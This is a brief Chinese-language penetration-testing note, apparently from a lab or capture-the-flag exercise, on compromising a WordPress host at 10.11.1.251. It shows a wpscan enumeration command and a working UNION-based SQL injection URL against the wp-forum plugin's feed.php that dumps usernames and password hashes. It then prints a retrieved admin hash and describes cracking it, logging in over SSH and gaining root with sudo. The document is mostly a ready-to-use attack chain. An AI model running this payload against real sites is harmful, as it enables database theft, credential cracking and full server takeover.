网络防御与对抗-wp漏洞利用

wpscan -u http://10.11.1.251/wp/ --enumerate vp    vt是扫描主题漏洞 

扫描插件漏洞 

wp-forum - SQL Injection 

参考连接：Wordpress wp-forum plugin SQL Injection - CXSecurity.com 

http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23 

admin#$P$B9wJdX0NkO95U2L.kqAGXsFufwSp5N1  hash解密之后得到密码：????? 

直接ssh 通过sean连接，然后sudo su 密码是?????，得到root权限